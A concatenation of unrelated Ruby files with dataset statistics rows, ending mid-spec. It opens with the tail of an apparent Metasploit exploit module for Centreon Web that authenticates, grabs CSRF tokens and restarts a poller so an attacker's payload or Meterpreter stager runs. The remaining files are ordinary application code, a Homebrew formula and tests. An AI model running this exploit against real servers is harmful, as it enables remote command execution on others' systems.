      'uri' => normalize_uri(target_uri.path, 'index.php')
    )
    # FIX: the original called response.get_cookies unguarded (NoMethodError
    # when the target is unreachable) and implicitly returned nil on empty
    # cookies, which later crashed `@cookies.empty?` in #exploit.
    return nil unless response

    cookies = response.get_cookies
    return nil if cookies.empty?

    cookies
  end

  # Fetches the anti-CSRF centreon_token hidden field from the given page.
  def get_token(uri, params = {})
    ## Get centreon_token value.
    request = {
      'method' => 'GET',
      'uri' => uri,
      'cookie' => @cookies
    }
    request = request.merge({ 'vars_get' => params }) unless params.empty?

    response = send_request_cgi(request)
    return nil unless response

    begin
      token = response.get_html_document.at('input[@name="centreon_token"]')['value']
    rescue NoMethodError
      return nil
    end

    return token
  end

  # Regenerates the poller configuration and restarts its engine, which
  # causes Centreon to execute the attached miscellaneous command.
  def restart_exportation(poller_id)
    print_status('Reload the poller to trigger exploitation.')
    token = get_token(normalize_uri(target_uri.path, 'main.get.php'), { 'p' => '60902', 'poller' => poller_id })
    unless token
      print_bad('Could not get the poller form token, potentially due to insufficient access rights.')
      return false
    end

    vprint_status(' -- Generating files.')
    response = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'include', 'configuration', 'configGenerate', 'xml', 'generateFiles.php'),
      'cookie' => @cookies,
      'vars_post' => {
        'poller' => poller_id,
        'debug' => 'true',
        'generate' => 'true'
      }
    )
    return false unless response

    vprint_status(' -- Restarting engine.')
    response = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'include', 'configuration', 'configGenerate', 'xml', 'restartPollers.php'),
      'cookie' => @cookies,
      'vars_post' => {
        'poller' => poller_id,
        'mode' => '2'
      }
    )
    return false unless response

    vprint_status(' -- Executing command.')
    response = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'include', 'configuration', 'configGenerate', 'xml', 'postcommand.php'),
      'cookie' => @cookies,
      'vars_post' => { 'poller' => poller_id }
    )
    return false unless response

    return true
  end

  def exploit
    # FIX: get_session may return nil (unreachable target / no cookies); the
    # original then crashed with NoMethodError on `@cookies.empty?`. Fail
    # loudly instead of silently doing nothing.
    @cookies = get_session
    if @cookies.nil? || @cookies.empty?
      fail_with(Failure::Unreachable, 'Could not obtain a session cookie from the target')
    end

    unless get_auth
      fail_with(Failure::NoAccess, 'Failed to authenticate against the Centreon Web panel')
    end

    case target['Type']
    when :cmd_unix
      execute_command(payload.encoded)
    when :meterpreter
      execute_command(generate_cmdstager.join(';'))
    end
  end
end
| 31.189349 | 121 | 0.582812 |
87b3837149103f0a007a9f40d83eb0aa0f2bb28f | 398 | module Jobs
  # Scheduled job that uploads the most recent Discourse backups to Google
  # Drive and then prunes stale copies from the Drive folder.
  class SyncBackupsToDrive < ::Jobs::Base
    sidekiq_options queue: 'low'

    def execute(arg)
      recent_backups = Backup.all.take(SiteSetting.discourse_sync_to_googledrive_quantity)

      recent_backups.each do |backup|
        DiscourseBackupToDrive::DriveSynchronizer.new(backup).sync
      end

      # Deletion operates on the whole batch at once.
      DiscourseBackupToDrive::DriveSynchronizer.new(recent_backups).delete_old_files
    end
  end
end
| 26.533333 | 83 | 0.738693 |
bba1bd02cd94c58f32917af9b14859c28ae4d4e6 | 23 | module StudyHelper
  # Rails view-helper namespace for study pages; intentionally empty for now.
end
| 7.666667 | 18 | 0.869565 |
bf912fbfc8f0647fff83399b8c73a06df84be74a | 282 | class InterleavedInnocentJointable < ActiveRecord::Migration
  # Creates the id-less people_reminders join table.
  def self.up
    create_table "people_reminders", :id => false do |t|
      t.integer :reminder_id
      t.integer :person_id
    end
  end

  # Removes the join table again.
  def self.down
    drop_table "people_reminders"
  end
end
| 21.692308 | 60 | 0.702128 |
1d0a397520793d886d52e9fccfaa425c6b8bcb78 | 623 | PADRINO_ROOT = File.dirname(__FILE__) unless defined? PADRINO_ROOT
# Fixture application used to exercise Padrino's code reloader; the reload
# tests edit this file, so keep its structure stable.
module LibDemo
  def self.give_me_a_random
    # Memoized so repeated calls (and reloads) observe the same value.
    @rand ||= rand(100)
  end
end
class Complex1Demo < Padrino::Application
  set :reload, true
  get("/old"){ "Old Sinatra Way" }
end
class Complex2Demo < Padrino::Application
  set :reload, true
  get("/old"){ "Old Sinatra Way" }
  controllers :var do
    get(:destroy){ params.inspect }
  end
  get("/"){ "The magick number is: 12!" } # Change only the number!!!
end
Complex1Demo.controllers do
  get("/"){ "Given random #{LibDemo.give_me_a_random}" }
end
# Intentionally empty controller block (reload fixture).
Complex2Demo.controllers do
end
Padrino.load!
| 18.878788 | 69 | 0.699839 |
1c69d85b212a03a031026b397d05bbbc968050c9 | 1,637 | require 'locomotive/common'
require_relative '../tools/styled_yaml'
require_relative 'loggers/sync_logger'
require_relative_all 'concerns'
require_relative 'sync_sub_commands/concerns/base_concern'
require_relative 'pull_sub_commands/pull_base_command'
require_relative_all 'pull_sub_commands'
require_relative_all 'sync_sub_commands'
module Locomotive::Wagon
  # Pulls remote site content (site, pages, content entries, translations)
  # down into the local Wagon site, optionally filtered by resource name.
  class SyncCommand < Struct.new(:env, :path, :options, :shell)
    # Resource kinds synced, in order; each maps to a Sync<Name>Command class.
    RESOURCES = %w(site pages content_entries translations).freeze
    include ApiConcern
    include DeployFileConcern
    include InstrumentationConcern
    include SpinnerConcern
    # Convenience constructor-and-run entry point.
    def self.sync(env, path, options, shell)
      self.new(env, path, options, shell).sync
    end
    # Runs the sync; verbose mode logs each step, otherwise a spinner is shown.
    def sync
      if options[:verbose]
        SyncLogger.new
        _sync
      else
        show_wait_spinner('Syncing content...') { _sync }
      end
    end
    private
    # Connects to the remote site and syncs every selected resource.
    def _sync
      api_client = api_site_client(connection_information)
      site = api_client.current_site.get
      each_resource do |klass|
        klass.sync(api_client, site, path, env)
      end
      print_result_message
    end
    # Yields each sync command class, honoring the --resources filter.
    def each_resource
      RESOURCES.each do |name|
        next if !options[:resources].blank? && !options[:resources].include?(name)
        klass = "Locomotive::Wagon::Sync#{name.camelcase}Command".constantize
        yield klass
      end
    end
    # Credentials/host for the chosen environment, read from the deploy file.
    def connection_information
      read_deploy_settings(self.env, self.path)
    end
    def print_result_message
      shell.say "\n\nThe content of your local Wagon site has been updated.", :green
      true
    end
  end
end
| 22.121622 | 84 | 0.694563 |
0394ce1d3183d90d96da4ed87f16356ffec449f0 | 1,446 | class Simg2img < Formula
  desc "Tool to convert Android sparse images to raw images and back"
  homepage "https://github.com/anestisb/android-simg2img"
  url "https://github.com/anestisb/android-simg2img/archive/1.1.3.tar.gz"
  sha256 "82eb629ac0beb67cc97396e031555f0461dcb66e1b93aad53e2f604a18037c51"
  head "https://github.com/anestisb/android-simg2img.git"
  bottle do
    cellar :any_skip_relocation
    sha256 "fdb01a50976fa5baef6f1d2b0fa96718256df5862cdc6e5a2d297f059031ae6f" => :high_sierra
    sha256 "782e2bfbd0c4f74573ad00028910c80d0d1ccc3a1d8aa6275a75c16ff62078fc" => :sierra
    sha256 "6895f9d52514757e07f47c9e18400330177175a1ef12e96ccf10b91577644557" => :el_capitan
  end
  def install
    # Upstream Makefile installs both img2simg and simg2img under PREFIX/bin.
    system "make", "PREFIX=#{prefix}", "install"
  end
  test do
    # Round-trip test: 512 KiB of zeros -> sparse image -> raw image must
    # reproduce the original file exactly.
    system "dd", "if=/dev/zero", "of=512k-zeros.img", "bs=512", "count=1024"
    assert_equal 524288, (testpath/"512k-zeros.img").size?,
                 "Could not create 512k-zeros.img with 512KiB of zeros"
    system bin/"img2simg", "512k-zeros.img", "512k-zeros.simg"
    assert_equal 44, (testpath/"512k-zeros.simg").size?,
                 "Converting 512KiB of zeros did not result in a 44 byte simg"
    system bin/"simg2img", "512k-zeros.simg", "new-512k-zeros.img"
    assert_equal 524288, (testpath/"new-512k-zeros.img").size?,
                 "Converting a 44 byte simg did not result in 512KiB"
    system "diff", "512k-zeros.img", "new-512k-zeros.img"
  end
end
| 45.1875 | 93 | 0.720609 |
3812193db510c226702b7a862b0cbbf2266a02c6 | 1,360 | =begin
#Tatum API

## Authentication <!-- ReDoc-Inject: <security-definitions> -->

OpenAPI spec version: 3.9.0

Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 3.0.31

=end
require 'spec_helper'
require 'json'
require 'date'
# Unit tests for Tatum::ScryptaTransaction
# Automatically generated by swagger-codegen (github.com/swagger-api/swagger-codegen)
# Please update as you see appropriate
# NOTE(review): the attribute examples below are generated placeholders with
# no assertions yet; only instantiation is actually verified.
describe 'ScryptaTransaction' do
  before do
    # run before each test
    @instance = Tatum::ScryptaTransaction.new
  end
  after do
    # run after each test
  end
  describe 'test an instance of ScryptaTransaction' do
    it 'should create an instance of ScryptaTransaction' do
      expect(@instance).to be_instance_of(Tatum::ScryptaTransaction)
    end
  end
  describe 'test attribute "from_address"' do
    it 'should work' do
      # assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
    end
  end
  describe 'test attribute "from_utxo"' do
    it 'should work' do
      # assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
    end
  end
  describe 'test attribute "to"' do
    it 'should work' do
      # assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
    end
  end
end
| 25.660377 | 102 | 0.725 |
ff2e910bffaae1e6d2c2853d52c8f035d5f715c8 | 14,144 | # Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# EDITING INSTRUCTIONS
# This file was generated from the file
# https://github.com/googleapis/googleapis/blob/master/google/cloud/speech/v1p1beta1/cloud_speech.proto,
# and updates to that file get reflected here through a refresh process.
# For the short term, the refresh process will only be runnable by Google
# engineers.
require "json"
require "pathname"
require "google/gax"
require "google/gax/operation"
require "google/longrunning/operations_client"
require "google/cloud/speech/v1p1beta1/cloud_speech_pb"
require "google/cloud/speech/v1p1beta1/credentials"
module Google
  module Cloud
    module Speech
      module V1p1beta1
        # Service that implements Google Cloud Speech API.
        #
        # @!attribute [r] speech_stub
        #   @return [Google::Cloud::Speech::V1p1beta1::Speech::Stub]
        class SpeechClient
          attr_reader :speech_stub

          # The default address of the service.
          SERVICE_ADDRESS = "speech.googleapis.com".freeze

          # The default port of the service.
          DEFAULT_SERVICE_PORT = 443

          # The default set of gRPC interceptors.
          GRPC_INTERCEPTORS = []

          # The default per-call timeout, in seconds.
          DEFAULT_TIMEOUT = 30

          # The scopes needed to make gRPC calls to all of the methods defined in
          # this service.
          ALL_SCOPES = [
            "https://www.googleapis.com/auth/cloud-platform"
          ].freeze

          # Long-running operations client bound to the Speech service address.
          class OperationsClient < Google::Longrunning::OperationsClient
            self::SERVICE_ADDRESS = SpeechClient::SERVICE_ADDRESS
            self::GRPC_INTERCEPTORS = SpeechClient::GRPC_INTERCEPTORS
          end

          # @param credentials [Google::Auth::Credentials, String, Hash, GRPC::Core::Channel, GRPC::Core::ChannelCredentials, Proc]
          #   Provides the means for authenticating requests made by the client. This parameter can
          #   be many types.
          #   A `Google::Auth::Credentials` uses a the properties of its represented keyfile for
          #   authenticating requests made by this client.
          #   A `String` will be treated as the path to the keyfile to be used for the construction of
          #   credentials for this client.
          #   A `Hash` will be treated as the contents of a keyfile to be used for the construction of
          #   credentials for this client.
          #   A `GRPC::Core::Channel` will be used to make calls through.
          #   A `GRPC::Core::ChannelCredentials` for the setting up the RPC client. The channel credentials
          #   should already be composed with a `GRPC::Core::CallCredentials` object.
          #   A `Proc` will be used as an updater_proc for the Grpc channel. The proc transforms the
          #   metadata for requests, generally, to give OAuth credentials.
          # @param scopes [Array<String>]
          #   The OAuth scopes for this service. This parameter is ignored if
          #   an updater_proc is supplied.
          # @param client_config [Hash]
          #   A Hash for call options for each method. See
          #   Google::Gax#construct_settings for the structure of
          #   this data. Falls back to the default config if not specified
          #   or the specified config is missing data points.
          # @param timeout [Numeric]
          #   The default timeout, in seconds, for calls made through this client.
          # @param metadata [Hash]
          #   Default metadata to be sent with each request. This can be overridden on a per call basis.
          # @param exception_transformer [Proc]
          #   An optional proc that intercepts any exceptions raised during an API call to inject
          #   custom error handling.
          def initialize \
              credentials: nil,
              scopes: ALL_SCOPES,
              client_config: {},
              timeout: DEFAULT_TIMEOUT,
              metadata: nil,
              exception_transformer: nil,
              lib_name: nil,
              lib_version: ""
            # These require statements are intentionally placed here to initialize
            # the gRPC module only when it's required.
            # See https://github.com/googleapis/toolkit/issues/446
            require "google/gax/grpc"
            require "google/cloud/speech/v1p1beta1/cloud_speech_services_pb"

            credentials ||= Google::Cloud::Speech::V1p1beta1::Credentials.default

            @operations_client = OperationsClient.new(
              credentials: credentials,
              scopes: scopes,
              client_config: client_config,
              timeout: timeout,
              lib_name: lib_name,
              lib_version: lib_version,
            )

            # Normalize the many accepted credential types into the channel,
            # channel credentials, or updater proc that create_stub expects.
            if credentials.is_a?(String) || credentials.is_a?(Hash)
              updater_proc = Google::Cloud::Speech::V1p1beta1::Credentials.new(credentials).updater_proc
            end
            if credentials.is_a?(GRPC::Core::Channel)
              channel = credentials
            end
            if credentials.is_a?(GRPC::Core::ChannelCredentials)
              chan_creds = credentials
            end
            if credentials.is_a?(Proc)
              updater_proc = credentials
            end
            if credentials.is_a?(Google::Auth::Credentials)
              updater_proc = credentials.updater_proc
            end

            package_version = Gem.loaded_specs['google-cloud-speech'].version.version

            # Build the x-goog-api-client header advertising client versions.
            google_api_client = "gl-ruby/#{RUBY_VERSION}"
            google_api_client << " #{lib_name}/#{lib_version}" if lib_name
            google_api_client << " gapic/#{package_version} gax/#{Google::Gax::VERSION}"
            google_api_client << " grpc/#{GRPC::VERSION}"
            google_api_client.freeze

            headers = { :"x-goog-api-client" => google_api_client }
            headers.merge!(metadata) unless metadata.nil?
            client_config_file = Pathname.new(__dir__).join(
              "speech_client_config.json"
            )
            defaults = client_config_file.open do |f|
              Google::Gax.construct_settings(
                "google.cloud.speech.v1p1beta1.Speech",
                JSON.parse(f.read),
                client_config,
                Google::Gax::Grpc::STATUS_CODE_NAMES,
                timeout,
                errors: Google::Gax::Grpc::API_ERRORS,
                metadata: headers
              )
            end

            # Allow overriding the service path/port in subclasses.
            service_path = self.class::SERVICE_ADDRESS
            port = self.class::DEFAULT_SERVICE_PORT
            interceptors = self.class::GRPC_INTERCEPTORS
            @speech_stub = Google::Gax::Grpc.create_stub(
              service_path,
              port,
              chan_creds: chan_creds,
              channel: channel,
              updater_proc: updater_proc,
              scopes: scopes,
              interceptors: interceptors,
              &Google::Cloud::Speech::V1p1beta1::Speech::Stub.method(:new)
            )

            @recognize = Google::Gax.create_api_call(
              @speech_stub.method(:recognize),
              defaults["recognize"],
              exception_transformer: exception_transformer
            )
            @long_running_recognize = Google::Gax.create_api_call(
              @speech_stub.method(:long_running_recognize),
              defaults["long_running_recognize"],
              exception_transformer: exception_transformer
            )
            @streaming_recognize = Google::Gax.create_api_call(
              @speech_stub.method(:streaming_recognize),
              defaults["streaming_recognize"],
              exception_transformer: exception_transformer
            )
          end

          # Service calls

          # Performs synchronous speech recognition: receive results after all audio
          # has been sent and processed.
          #
          # @param config [Google::Cloud::Speech::V1p1beta1::RecognitionConfig | Hash]
          #   *Required* Provides information to the recognizer that specifies how to
          #   process the request.
          #   A hash of the same form as `Google::Cloud::Speech::V1p1beta1::RecognitionConfig`
          #   can also be provided.
          # @param audio [Google::Cloud::Speech::V1p1beta1::RecognitionAudio | Hash]
          #   *Required* The audio data to be recognized.
          #   A hash of the same form as `Google::Cloud::Speech::V1p1beta1::RecognitionAudio`
          #   can also be provided.
          # @param options [Google::Gax::CallOptions]
          #   Overrides the default settings for this call, e.g, timeout,
          #   retries, etc.
          # @yield [result, operation] Access the result along with the RPC operation
          # @yieldparam result [Google::Cloud::Speech::V1p1beta1::RecognizeResponse]
          # @yieldparam operation [GRPC::ActiveCall::Operation]
          # @return [Google::Cloud::Speech::V1p1beta1::RecognizeResponse]
          # @raise [Google::Gax::GaxError] if the RPC is aborted.
          # @example
          #   require "google/cloud/speech"
          #
          #   speech_client = Google::Cloud::Speech.new(version: :v1p1beta1)
          #   encoding = :FLAC
          #   sample_rate_hertz = 44100
          #   language_code = "en-US"
          #   config = {
          #     encoding: encoding,
          #     sample_rate_hertz: sample_rate_hertz,
          #     language_code: language_code
          #   }
          #   uri = "gs://bucket_name/file_name.flac"
          #   audio = { uri: uri }
          #   response = speech_client.recognize(config, audio)
          def recognize \
              config,
              audio,
              options: nil,
              &block
            req = {
              config: config,
              audio: audio
            }.delete_if { |_, v| v.nil? }
            req = Google::Gax::to_proto(req, Google::Cloud::Speech::V1p1beta1::RecognizeRequest)
            @recognize.call(req, options, &block)
          end

          # Performs asynchronous speech recognition: receive results via the
          # google.longrunning.Operations interface. Returns either an
          # +Operation.error+ or an +Operation.response+ which contains
          # a +LongRunningRecognizeResponse+ message.
          #
          # @param config [Google::Cloud::Speech::V1p1beta1::RecognitionConfig | Hash]
          #   *Required* Provides information to the recognizer that specifies how to
          #   process the request.
          #   A hash of the same form as `Google::Cloud::Speech::V1p1beta1::RecognitionConfig`
          #   can also be provided.
          # @param audio [Google::Cloud::Speech::V1p1beta1::RecognitionAudio | Hash]
          #   *Required* The audio data to be recognized.
          #   A hash of the same form as `Google::Cloud::Speech::V1p1beta1::RecognitionAudio`
          #   can also be provided.
          # @param options [Google::Gax::CallOptions]
          #   Overrides the default settings for this call, e.g, timeout,
          #   retries, etc.
          # @return [Google::Gax::Operation]
          # @raise [Google::Gax::GaxError] if the RPC is aborted.
          # @example
          #   require "google/cloud/speech"
          #
          #   speech_client = Google::Cloud::Speech.new(version: :v1p1beta1)
          #   encoding = :FLAC
          #   sample_rate_hertz = 44100
          #   language_code = "en-US"
          #   config = {
          #     encoding: encoding,
          #     sample_rate_hertz: sample_rate_hertz,
          #     language_code: language_code
          #   }
          #   uri = "gs://bucket_name/file_name.flac"
          #   audio = { uri: uri }
          #
          #   # Register a callback during the method call.
          #   operation = speech_client.long_running_recognize(config, audio) do |op|
          #     raise op.results.message if op.error?
          #     op_results = op.results
          #     # Process the results.
          #
          #     metadata = op.metadata
          #     # Process the metadata.
          #   end
          #
          #   # Or use the return value to register a callback.
          #   operation.on_done do |op|
          #     raise op.results.message if op.error?
          #     op_results = op.results
          #     # Process the results.
          #
          #     metadata = op.metadata
          #     # Process the metadata.
          #   end
          #
          #   # Manually reload the operation.
          #   operation.reload!
          #
          #   # Or block until the operation completes, triggering callbacks on
          #   # completion.
          #   operation.wait_until_done!
          def long_running_recognize \
              config,
              audio,
              options: nil
            req = {
              config: config,
              audio: audio
            }.delete_if { |_, v| v.nil? }
            req = Google::Gax::to_proto(req, Google::Cloud::Speech::V1p1beta1::LongRunningRecognizeRequest)
            operation = Google::Gax::Operation.new(
              @long_running_recognize.call(req, options),
              @operations_client,
              Google::Cloud::Speech::V1p1beta1::LongRunningRecognizeResponse,
              Google::Cloud::Speech::V1p1beta1::LongRunningRecognizeMetadata,
              call_options: options
            )
            # NOTE(review): the block parameter shadows the local +operation+
            # variable; harmless (they refer to the same object) but worth
            # renaming in the generator.
            operation.on_done { |operation| yield(operation) } if block_given?
            operation
          end
        end
      end
    end
  end
end
| 42.990881 | 131 | 0.591488 |
216aaae70ee261592b08f5165fede4fbab25f03e | 1,016 | require 'spec_helper'
# Verifies NamespacePolicy permissions for anonymous users, regular users,
# the namespace owner, and admins.
describe NamespacePolicy do
  let(:user) { create(:user) }
  let(:owner) { create(:user) }
  let(:admin) { create(:admin) }
  let(:namespace) { create(:namespace, owner: owner) }
  # Abilities only the owner (and admins) should hold.
  let(:owner_permissions) { [:create_projects, :admin_namespace, :read_namespace, :read_statistics] }
  subject { described_class.new(current_user, namespace) }
  context 'with no user' do
    let(:current_user) { nil }
    it { is_expected.to be_banned }
  end
  context 'regular user' do
    let(:current_user) { user }
    it { is_expected.to be_disallowed(*owner_permissions) }
  end
  context 'owner' do
    let(:current_user) { owner }
    it { is_expected.to be_allowed(*owner_permissions) }
    context 'user who has exceeded project limit' do
      let(:owner) { create(:user, projects_limit: 0) }
      it { is_expected.to be_disallowed(:create_projects) }
    end
  end
  context 'admin' do
    let(:current_user) { admin }
    it { is_expected.to be_allowed(*owner_permissions) }
  end
end
| 23.627907 | 101 | 0.67815 |
61fe36b71c7573f92ec7e109e957ee0400ea7d09 | 326 | module TD::Types
  # The connection state has changed.
  # This update must be used only to show a human-readable description of the connection state.
  #
  # @attr state [TD::Types::ConnectionState] The new connection state.
  class Update::ConnectionState < Update
    # Typed attribute declaration (TD::Types attribute DSL).
    attribute :state, TD::Types::ConnectionState
  end
end
| 32.6 | 95 | 0.742331 |
ff70e40ceb61b08487d3b9bd6e912322dee6e58b | 319 | # frozen_string_literal: true
FactoryBot.define do
  # Factory for the registration-number step of the renewal workflow.
  factory :registration_number_form, class: WasteCarriersEngine::RegistrationNumberForm do
    trait :has_required_data do
      # The form object wraps a renewing registration parked at this step.
      initialize_with { new(create(:renewing_registration, :has_required_data, workflow_state: "registration_number_form")) }
    end
  end
end
| 31.9 | 125 | 0.799373 |
bbf77aed1c2c459cfc9a5c955186209ad2ba1911 | 1,912 | # Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Network::Mgmt::V2019_06_01
  module Models
    #
    # Response for CheckIPAddressAvailability API service call.
    #
    class IPAddressAvailabilityResult
      include MsRestAzure

      # @return [Boolean] Private IP address availability.
      attr_accessor :available

      # @return [Array<String>] Contains other available private IP addresses
      # if the asked for address is taken.
      attr_accessor :available_ipaddresses


      #
      # Mapper for IPAddressAvailabilityResult class as Ruby Hash.
      # This will be used for serialization/deserialization.
      #
      def self.mapper()
        {
          client_side_validation: true,
          required: false,
          serialized_name: 'IPAddressAvailabilityResult',
          type: {
            name: 'Composite',
            class_name: 'IPAddressAvailabilityResult',
            model_properties: {
              available: {
                client_side_validation: true,
                required: false,
                serialized_name: 'available',
                type: {
                  name: 'Boolean'
                }
              },
              # Serialized over the wire as a JSON array of strings.
              available_ipaddresses: {
                client_side_validation: true,
                required: false,
                serialized_name: 'availableIPAddresses',
                type: {
                  name: 'Sequence',
                  element: {
                      client_side_validation: true,
                      required: false,
                      serialized_name: 'StringElementType',
                      type: {
                        name: 'String'
                      }
                  }
                }
              }
            }
          }
        }
      end
    end
  end
end
| 28.969697 | 77 | 0.524059 |
acf8ab814fd868a726a4ad516f4e0054fbee0cbc | 612 | class Option::ActivationPriceCalc
  class << self
    # Price to activate +option+ now, prorated for the remainder of the
    # user's current billing interval.
    def activation_price(user, option)
      user.plan.option_price(option.code) * billing_interval_percent_left(user)
    end

    # Fraction (0.0..1.0) of the billing interval still ahead of the user.
    def billing_interval_percent_left(user)
      elapsed_days = (Time.current.to_date - user.last_withdrawal_date.to_date).to_i
      days_left_to_withdrawal(elapsed_days).to_f / User::BILLING_INTERVAL.to_f
    end

    # Days remaining until the next withdrawal; a full interval elapsed is
    # treated as 30 days left (preserved historical behaviour).
    def days_left_to_withdrawal(days_passed)
      return 30 if days_passed == User::BILLING_INTERVAL

      User::BILLING_INTERVAL - days_passed
    end
  end
end
| 27.818182 | 83 | 0.712418 |
6a77cda2d2122f610261421af21e02f1c88aef12 | 402 | class AddModerationLog < ActiveRecord::Migration[5.2]
  # Adds a moderator flag to users and a moderations audit-log table.
  def up
    add_column "users", "is_moderator", :boolean, :default => false

    create_table "moderations" do |t|
      t.timestamps :null => false
      t.integer "moderator_user_id"
      t.integer "story_id"
      t.integer "comment_id"
      t.integer "user_id"
      t.text "action"
      t.text "reason"
    end
  end

  # Reverse of +up+. The original down was a no-op, which silently left the
  # moderations table and users.is_moderator column behind on rollback.
  def down
    drop_table "moderations"
    remove_column "users", "is_moderator"
  end
end
| 21.157895 | 67 | 0.636816 |
e8755cf76918f31ca54645352bd0b4703a70e308 | 4,973 | require 'simplecov'
# Start coverage tracking before any application code is loaded.
SimpleCov.start 'rails'
# This file was generated by the `rails generate rspec:install` command. Conventionally, all
# specs live under a `spec` directory, which RSpec adds to the `$LOAD_PATH`.
# The generated `.rspec` file contains `--require spec_helper` which will cause
# this file to always be loaded, without a need to explicitly require it in any
# files.
#
# Given that it is always loaded, you are encouraged to keep this file as
# light-weight as possible. Requiring heavyweight dependencies from this file
# will add to the boot time of your test suite on EVERY test run, even for an
# individual file that may not need all of that loaded. Instead, consider making
# a separate helper file that requires the additional dependencies and performs
# the additional setup, and require it from the spec files that actually need
# it.
#
# See http://rubydoc.info/gems/rspec-core/RSpec/Core/Configuration
RSpec.configure do |config|
  # rspec-expectations config goes here. You can use an alternate
  # assertion/expectation library such as wrong or the stdlib/minitest
  # assertions if you prefer.
  config.expect_with :rspec do |expectations|
    # This option will default to `true` in RSpec 4. It makes the `description`
    # and `failure_message` of custom matchers include text for helper methods
    # defined using `chain`, e.g.:
    # be_bigger_than(2).and_smaller_than(4).description
    # # => "be bigger than 2 and smaller than 4"
    # ...rather than:
    # # => "be bigger than 2"
    expectations.include_chain_clauses_in_custom_matcher_descriptions = true
  end
  # rspec-mocks config goes here. You can use an alternate test double
  # library (such as bogus or mocha) by changing the `mock_with` option here.
  config.mock_with :rspec do |mocks|
    # Prevents you from mocking or stubbing a method that does not exist on
    # a real object. This is generally recommended, and will default to
    # `true` in RSpec 4.
    mocks.verify_partial_doubles = true
  end
  # This option will default to `:apply_to_host_groups` in RSpec 4 (and will
  # have no way to turn it off -- the option exists only for backwards
  # compatibility in RSpec 3). It causes shared context metadata to be
  # inherited by the metadata hash of host groups and examples, rather than
  # triggering implicit auto-inclusion in groups with matching metadata.
  config.shared_context_metadata_behavior = :apply_to_host_groups
  # The settings below are suggested to provide a good initial experience
  # with RSpec, but feel free to customize to your heart's content.
  #   # This allows you to limit a spec run to individual examples or groups
  #   # you care about by tagging them with `:focus` metadata. When nothing
  #   # is tagged with `:focus`, all examples get run. RSpec also provides
  #   # aliases for `it`, `describe`, and `context` that include `:focus`
  #   # metadata: `fit`, `fdescribe` and `fcontext`, respectively.
  #   config.filter_run_when_matching :focus
  #
  #   # Allows RSpec to persist some state between runs in order to support
  #   # the `--only-failures` and `--next-failure` CLI options. We recommend
  #   # you configure your source control system to ignore this file.
  #   config.example_status_persistence_file_path = "spec/examples.txt"
  #
  #   # Limits the available syntax to the non-monkey patched syntax that is
  #   # recommended. For more details, see:
  #   #   - http://rspec.info/blog/2012/06/rspecs-new-expectation-syntax/
  #   #   - http://www.teaisaweso.me/blog/2013/05/27/rspecs-new-message-expectation-syntax/
  #   #   - http://rspec.info/blog/2014/05/notable-changes-in-rspec-3/#zero-monkey-patching-mode
  #   config.disable_monkey_patching!
  #
  #   # Many RSpec users commonly either run the entire suite or an individual
  #   # file, and it's useful to allow more verbose output when running an
  #   # individual spec file.
  #   if config.files_to_run.one?
  #     # Use the documentation formatter for detailed output,
  #     # unless a formatter has already been configured
  #     # (e.g. via a command-line flag).
  #     config.default_formatter = "doc"
  #   end
  #
  #   # Print the 10 slowest examples and example groups at the
  #   # end of the spec run, to help surface which specs are running
  #   # particularly slow.
  #   config.profile_examples = 10
  #
  #   # Run specs in random order to surface order dependencies. If you find an
  #   # order dependency and want to debug it, you can fix the order by providing
  #   # the seed, which is printed after each run.
  #   #     --seed 1234
  #   config.order = :random
  #
  #   # Seed global randomization in this process using the `--seed` CLI option.
  #   # Setting this allows you to use `--seed` to deterministically reproduce
  #   # test failures related to randomization by passing the same `--seed` value
  #   # as the one that triggered the failure.
  #   Kernel.srand config.seed
end
| 50.232323 | 96 | 0.717474 |
03d1f46b517b58113c57110dee157cc4efd567d5 | 906 | require 'spec_helper'
# Verifies the shared behaviour mixed into build statuses: no action, and
# details visibility gated on the user's read access to the build.
describe Gitlab::Ci::Status::Build::Common do
  let(:user) { create(:user) }
  let(:build) { create(:ci_build) }
  let(:project) { build.project }
  subject do
    Gitlab::Ci::Status::Core
      .new(build, user)
      .extend(described_class)
  end
  describe '#has_action?' do
    it { is_expected.not_to have_action }
  end
  describe '#has_details?' do
    context 'when user has access to read build' do
      before do
        project.team << [user, :developer]
      end
      it { is_expected.to have_details }
    end
    context 'when user does not have access to read build' do
      before do
        project.update(public_builds: false)
      end
      it { is_expected.not_to have_details }
    end
  end
  describe '#details_path' do
    it 'links to the build details page' do
      expect(subject.details_path).to include "jobs/#{build.id}"
    end
  end
end
| 21.571429 | 64 | 0.643488 |
1db6b3665d8648fb2dcade2ffcb9cd4ff10562f2 | 101 | class GameSessionsPlayer < ApplicationRecord
  # Join model linking a player to a game session.
  belongs_to :player
  belongs_to :game_session
end
| 20.2 | 44 | 0.80198 |
870d468c1becaaefcc6d439bc3fc7494c5aacca4 | 3,336 | require 'rails_helper'
# Exercises Entry#import_text parsing of dialect-corpus lines of the form
#   "<example>; <location>; <source>."
# NOTE: the heredoc fixture text below is intentionally left byte-for-byte
# as stored (including its damaged diacritics) — the parser matches on it.
RSpec.describe Entry, type: :model do
  describe '#import_text' do
    let(:user) { User.create(name: 'martin') }
    let(:entry) {
      Entry.create(
        user: user,
        heslo: Faker::Lorem.word,
        rod: Entry.map_rod('m'),
        druh: Entry.map_druh('adj')
      )
    }
    let(:meaning) {
      Meaning.create(cislo: 1, kvalifikator: Faker::Lorem.word, vyznam: Faker::Lorem.word, entry: entry)
    }
    it 'parses lokalizace' do
      jelen_test_data = <<EOD
